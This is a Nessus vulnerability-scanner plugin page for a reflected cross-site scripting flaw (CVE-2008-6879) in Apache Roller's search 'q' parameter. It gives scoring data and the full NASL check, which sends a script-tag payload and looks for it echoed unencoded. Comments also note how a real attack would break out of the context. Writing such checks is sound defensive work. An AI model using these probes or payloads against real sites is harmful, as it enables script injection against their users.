
Apache Roller q Parameter XSS


4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.006 Low

EPSS

Percentile

78.2%

The remote host is running Apache Roller, a multi-user blog server written in Java.

The version of Apache Roller installed on the remote host fails to sanitize user input to the 'q' parameter of search requests before including it in dynamic HTML output (a reflected cross-site scripting flaw, CWE-79). An attacker may be able to leverage this issue to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration block: identifiers, cross-references, report text,
# CVSS scoring and the dependencies/ports that gate the scan.  The NASL
# engine sets 'description' while loading the plugin for registration;
# the scanning logic further down runs on the normal pass.
if (description)
{
  script_id(35299);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  # External identifiers for the flaw (CVE, BugTraq ID, Secunia advisory).
  script_cve_id("CVE-2008-6879");
  script_bugtraq_id(33110);
  script_xref(name:"SECUNIA", value:"31523");

  script_name(english:"Apache Roller q Parameter XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Java web application that is affected
by a cross-site scripting vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Apache Roller, a multi-user blog server
written in Java. 

The version of Apache Roller installed on the remote host fails to
sanitize user input to the 'q' parameter of search requests before
including it in dynamic HTML output.  An attacker may be able to
leverage this issue to inject arbitrary HTML and script code into a
user's browser to be executed within the security context of the
affected site.");
  # http://mail-archives.apache.org/mod_mbox/roller-dev/200807.mbox/%[email protected]%3E
  # NOTE(review): the message-id in the archive URL above looks mangled
  # (the '[email protected]' fragment); the nessus.org short link below is the
  # authoritative reference.
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?75c214e4");
  # No released version is named as fixed; the remediation is a source
  # patch identified by its Subversion revision.
  script_set_attribute(attribute:"solution", value:
"Apply the code fix referenced in revision 668737 from the Subversion
repository.");
  # CVSSv2 4.3: network, medium complexity (needs user interaction),
  # unauthenticated, integrity impact only -- the usual reflected-XSS score.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  # The plugin actively sends the payload (see the scan logic below), so
  # the finding is a confirmed reflection rather than a version match.
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(79);

  script_set_attribute(attribute:"plugin_publication_date", value:"2009/01/07");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:roller");
  # Extra candidate directories are only probed when thorough tests are on.
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: this plugin sends a crafted request to the target.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.");

  # cross_site_scripting.nasl supplies the generic-XSS marker checked below
  # so hosts that reflect anything are not reported twice.
  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");


# Scan logic: locate a Roller instance under each candidate directory,
# submit a marker payload through the search form's 'q' parameter and
# report if the server echoes it back unencoded.
port = get_http_port(default:80);
# Skip hosts already flagged as reflecting arbitrary input (key presumably
# set by cross_site_scripting.nasl, a dependency above) -- this finding
# would be redundant there.
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# A simple exploit.
# SCRIPT_NAME inside the alert() makes the reflected marker unique to this
# plugin, so a match cannot come from some other scanner's leftover content.
exploit = string("nessus<script>alert('", SCRIPT_NAME, "')</script>");


# Loop through directories.
# Candidate directories: the usual Roller paths plus whatever CGI
# directories were discovered; only the discovered ones in non-thorough mode.
if (thorough_tests) dirs = list_uniq(make_list("/roller", "/blogs", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Look for Roller and its search form.
  if (dir == "/") url = dir;
  else url = dir + "/";

  # exit_on_fail: a dead web server ends the whole plugin, not just this dir.
  res = http_get_cache(item:url, port:port, exit_on_fail: 1);

  # If...
  if (
    # it's Roller and...
    # Fingerprints: generator meta tag, Roller UI login redirect, or the
    # CSS class/selector names Roller's default theme emits.
    (
      '<meta name="generator" content="Roller Weblogger' >< res ||
      '/roller-ui/login-redirect.rol"' >< res ||
      '/roller-ui/login-redirect.jsp"' >< res ||
      '<li class="rReferersListItem">' >< res ||
      'ul.rMenu, ul.rFolder, ul.rFeeds, ul.rReferersList, ul.rEntriesList' >< res
    ) &&
    # we can find the search form.
    '<form id="searchForm" method="get" action="' >< res
  )
  {
    # Pull the form's action attribute: everything after the opening quote
    # up to the next double quote.
    search_url = strstr(res, '<form id="searchForm" method="get" action="') - 
      '<form id="searchForm" method="get" action="';
    search_url = search_url - strstr(search_url, '"');

    # The action value comes from an untrusted page.  Only accept a
    # non-empty absolute path made of plain path characters: the regex
    # rejects ':', '?', '&', '<', '>' and whitespace, so the request built
    # below can't be steered by an attacker-controlled scheme, host or
    # extra query string.  (The request is sent to this host/port via
    # 'item:', so even a '//' prefix would stay on-target.)
    if (
      strlen(search_url) > 0 && 
      stridx(search_url, '/') == 0 &&
      ereg(string:search_url, pattern:"^[/a-zA-Z0-9_-]+$")
    )
    {
      # Try to exploit the issue.
      # Payload goes in 'q', URL-encoded so '<', '>' and quotes survive transit.
      url = string(search_url, "?q=", urlencode(str:exploit));

      res = http_send_recv3(method:"GET", item:url, port:port);
      if (res == NULL) exit(0);

      # There's a problem if we see our exploit in the default search form.
      # res[2] is the response body.  Both reflection points are contexts
      # where a literal <script> tag is inert -- inside <title> (RCDATA)
      # and inside a double-quoted href value (the payload only carries
      # single quotes) -- so a match proves the input is echoed without
      # HTML encoding ('<', '>', ''' and '/' all intact), not that this
      # exact payload executes.  A real attack would presumably use a
      # context-breaking payload (e.g. closing the title or attribute
      # first); the missing encoding is the vulnerability being confirmed.
      if (
        string("<title>Search Results for '", exploit) >< res[2] ||
        string('You searched this site for "<a href="http://dictionary.com/search?q=', exploit) >< res[2]
      )
      {
        # Port-level marker consumed by other XSS plugins.
        set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);

        if (report_verbosity)
        {
          # The URL in the report is the one that produced the reflection
          # (build_url adds scheme/host/port), so the finding can be
          # reproduced by hand.
          report = string(
            "\n",
            "Nessus was able to exploit the issue using the following URL :\n",
            "\n",
            "  ", build_url(port:port, qs:url), "\n"
          );
          security_warning(port:port, extra:report);
        }
        else security_warning(port);
        # No exit here: a Roller instance under another directory is
        # reported separately on the next iteration.
      }
    }
  }
}
Vendor: apache — Product: roller — CPE: cpe:/a:apache:roller
